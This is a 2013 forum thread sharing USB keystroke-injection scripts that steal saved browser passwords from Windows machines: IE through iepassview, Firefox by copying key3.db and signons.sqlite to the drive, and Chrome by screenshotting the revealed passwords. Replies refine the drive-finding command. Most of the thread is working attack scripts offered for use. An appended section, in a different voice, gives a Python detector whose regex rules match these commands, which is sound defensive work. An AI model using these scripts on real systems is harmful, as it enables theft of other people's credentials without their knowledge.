mrt0mat0 Posted January 20, 2013 (edited)

So, I didn't see any examples of this, so I tried my best to get some basic ones down. Now, I only tested this on two systems and they seem to work. The timing for some might need to be tweaked. The biggest issue is that each browser uses different methods, so I made one for each...

Files on flash drive: iepv.exe, evac.txt

Internet Explorer 9

This is actually the biggest cheat, as I just used iepassview, but it's very portable, so with my twin duck I just threw it on there and it worked like a dream, except it takes like 10 seconds to run...

    DEFAULTDELAY 50
    DELAY 4000
    GUI m
    DELAY 200
    CTRL ESC
    STRING cmd
    ENTER
    DELAY 200
    STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )
    ENTER
    DELAY 200
    STRING iepv.exe
    ENTER
    DELAY 10000
    CTRL s
    DELAY 200
    STRING ie_passes.txt
    ENTER
    DELAY 1000
    ALT F4
    DELAY 200
    STRING exit
    ENTER

Firefox

This copies two files over, key3 and signon. Once you have them you can just drop them in a profile and go to the passwords section in Firefox.

    DEFAULTDELAY 50
    DELAY 3000
    GUI m
    DELAY 200
    CTRL ESC
    STRING cmd
    ENTER
    DELAY 200
    STRING cd %userprofile%
    ENTER
    DELAY 200
    STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\
    TAB
    STRING \key3.db key3.db
    ENTER
    DELAY 200
    STRING copy AppData\Roaming\Mozilla\Firefox\Profiles\
    TAB
    STRING \signons.sqlite signons.sqlite
    ENTER
    DELAY 200
    STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: exit: )
    ENTER
    STRING move %userprofile%\key3.db key3.db
    ENTER
    DELAY 200
    STRING move %userprofile%\signons.sqlite signons.sqlite
    ENTER
    STRING exit
    ENTER

Chrome 24

I went to the passwords page, switched all the passwords on manually and screen capped it. The biggest flaw with this one is the password amount. This sample runs 8 passwords. If there are less, you have a chance of randomly changing something. If there are more, you don't get all the ones available, which isn't always that big of a deal. This was only tested in Chrome 24.0, so it may be different depending on the version.

    DEFAULTDELAY 50
    DELAY 3000
    GUI m
    DELAY 200
    CTRL ESC
    STRING chrome
    ENTER
    DELAY 1000
    ESCAPE
    DELAY 500
    ALT SPACE
    STRING x
    DELAY 200
    CTRL l
    STRING chrome://settings/passwords
    ENTER
    DELAY 200
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    SPACE
    TAB
    TAB
    TAB
    SHIFT TAB
    ALT PRINTSCREEN
    ALT F4
    DELAY 400
    GUI r
    STRING mspaint
    ENTER
    DELAY 1000
    CTRL v
    DELAY 300
    CTRL s
    DELAY 300
    STRING %userprofile%\chrome.png
    ENTER
    DELAY 300
    ALT f
    STRING x
    DELAY 300
    CTRL ESC
    STRING cmd
    ENTER
    DELAY 300
    STRING for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )
    ENTER
    DELAY 300
    STRING move %userprofile%\chrome.png chrome.png
    ENTER
    DELAY 300
    STRING exit
    ENTER

Look forward to feedback and improvements.

Edited January 20, 2013 by smacks
Bucky67GTO Posted January 21, 2013

Love it so far. Can't wait to put it through its paces. Thought about grabbing some of this through the registry, but this seems more straightforward.
mrt0mat0 (Author) Posted January 21, 2013

> Love it so far. Can't wait to put it through its paces. Thought about grabbing some of this through the registry, but this seems more straightforward.

I know IE keeps the files in the registry, but they're encrypted. I was going to look up the commands to decrypt to make it a pure "HID" attack, but I got distracted with other things. Also, Chrome has files you can pull, but I'm not 100% on which ones and how I'd decrypt those as well. I know it's possible though.
overwraith Posted January 21, 2013

Midnight snake showed me an improvement to the command line drive finding code:

    J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
    J:\>echo %myd%
    J:

This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.
no42 Posted January 21, 2013

> Midnight snake showed me an improvement to the command line drive finding code:
>
>     J:\>for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d
>     J:\>echo %myd%
>     J:
>
> This was part of what one of his firmware versions would automatically type in. So instead of using my for loop, we can use this loop which looks for a volume labeled "DUCKY". This means we don't need the text file on the root of the drive anymore.

Just remember to label the SD card "DUCKY" for this to work... they're not labelled by default (if they are, it's usually some pseudo-random code, e.g. "23AF-3DDE").
overwraith Posted January 22, 2013

> Just remember to label the SD card "DUCKY" for this to work... they're not labelled by default (if they are, it's usually some pseudo-random code, e.g. "23AF-3DDE").

But it is much better than looking for a file that does nothing on the root of the drive.
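From the defender's side, the command lines this thread settles on are distinctive in process-creation telemetry: the drive-letter loop with IF EXIST, the wmic volume ... findstr "DUCKY" search, and the copies of the Firefox credential store. The following is an added example, not code from this thread: a small Python scanner over constructed Sysmon-style process records (the record format and rule names are my own).

```python
import re

# Detection rules for the drive-discovery and credential-file patterns
# discussed in the thread. Rule names are my own labels.
RULES = [
    ("drive_letter_loop",
     re.compile(r"for\s+%\w+\s+in\s*\(\s*A\s+B\s+C\s+D\s+E", re.I)),
    ("if_exist_marker_file",
     re.compile(r"IF\s+EXIST\s+%\w+:\\\S+\s+%\w+:", re.I)),
    ("wmic_volume_label_search",
     re.compile(r"wmic\s+volume\s+get\s+driveletter.*findstr", re.I)),
    ("browser_cred_dump_tool", re.compile(r"\biepv\.exe\b", re.I)),
    ("firefox_cred_store_copy",
     re.compile(r"(copy|move)\s+.*(key3\.db|signons\.sqlite)", re.I)),
]

# Simplified process-creation record: "Image=<path> CommandLine=<text>"
# (a constructed format, not the real Sysmon XML).
RECORD = re.compile(r"^Image=(\S+)\s+CommandLine=(.*)$")


def scan(lines):
    """Return (line_index, rule_name) for every rule each record matches."""
    hits = []
    for idx, line in enumerate(lines):
        m = RECORD.match(line)
        if not m:
            continue  # not a process-creation record; skip it
        for name, rx in RULES:
            if rx.search(m.group(2)):
                hits.append((idx, name))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_LOG = [
    r"Image=C:\Windows\System32\cmd.exe CommandLine=for %a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) do (IF EXIST %a:\evac.txt %a: )",
    r"Image=C:\Windows\System32\cmd.exe CommandLine=for /f %d in ('wmic volume get driveletter, label | findstr DUCKY') do set myd=%d",
    r"Image=C:\Windows\System32\cmd.exe CommandLine=dir C:\Users",
    r"Image=C:\Windows\System32\cmd.exe CommandLine=copy AppData\Roaming\Mozilla\Firefox\Profiles\x.default\signons.sqlite signons.sqlite",
    r"Image=E:\iepv.exe CommandLine=iepv.exe",
]

if __name__ == "__main__":
    for idx, name in scan(SAMPLE_LOG):
        print(f"record {idx}: {name}")
```

The loop-and-IF-EXIST rule fires twice on the first record, while the plain "dir" record produces no hit; the wmic rule deliberately ignores the label value so a renamed volume label does not evade it.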